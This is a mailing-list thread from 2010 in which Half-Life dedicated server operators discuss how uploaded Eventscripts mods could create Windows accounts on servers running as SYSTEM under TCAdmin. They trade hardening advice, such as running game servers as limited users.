server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http
Re: [hlds] Eventscripts - Creating Windows Account
I don't want to give the impression i'm trying to flame anyone or anything I just don't want to leave people with TCAdmin thinking they are SOL because they are not. Anyone that leaves anything at default settings is not security aware and is going to be at risk no matter what you run. If you run a GSP it's your job to be aware and security conscious. However people have to know they the only option is not linux with custom software. We don't want everything thinking they need to run out and hire a programmer to reinvent the wheel. We run windows with TCadmin and have never once had an issue (2+ years) I would say stick with what you know and make sure you know everything you can about security. You're always going to have the linux guys po poing windows and visa-versa with the windows guys. None of the listed exploits would have worked on our servers not because we run windows or because we run tcadmin. It's because we what treats are out and about and we know how to secure ourselves agents them. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Steven Crothers Sent: Tuesday, March 02, 2010 4:45 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account Well this can easily turn into a Flame TCAdmin thread, but I'll simply leave it with this: TCAdmin is NOT a secure panel, people who are reading this that are running TCAdmin - if you haven't gone above and beyond with your setup, you ARE at risk everyday to losing 100% of your machines. Let's not forget that that many GSPs run games on their master server, which means their entire database is at risk. Gameserver security can only truly be obtained with a proper custom control panel, nothing off the shelf provides any type of security, and this thread is a great example of that. When was the last time a server at Gameservers.com was hacked? I can't recall once when it ever happened. Gameserver hosting should be done on Linux with SELinux + GRSEC. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Mike Stiehm Sent: Tuesday, March 02, 2010 5:28 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account This is true for the default setting. However TCAdmin can be set to use a specific user for all game servers created from that point on and you can go back in the windows services control panel and change the user that the service executes under. It's really easy and didn't take me much more than 20 min for 20 servers and I have no issues (well over a year running like this) -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Lane Eckley Sent: Tuesday, March 02, 2010 4:11 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account That is a simple solution to the problem. However if you are a GSP or otherwise using TCAdmin like many do, there are some side issues that go along with setting a game server to use a limited access. (Important note on TCAdmin: TCAdmin runs as system and so do all the services it powers - FYI in case you are unaware.) This was mainly a warning going out before anyone got completely hacked and lost access to their machines. -Lane -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Saul Rennison Sent: Tuesday, March 02, 2010 5:03 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http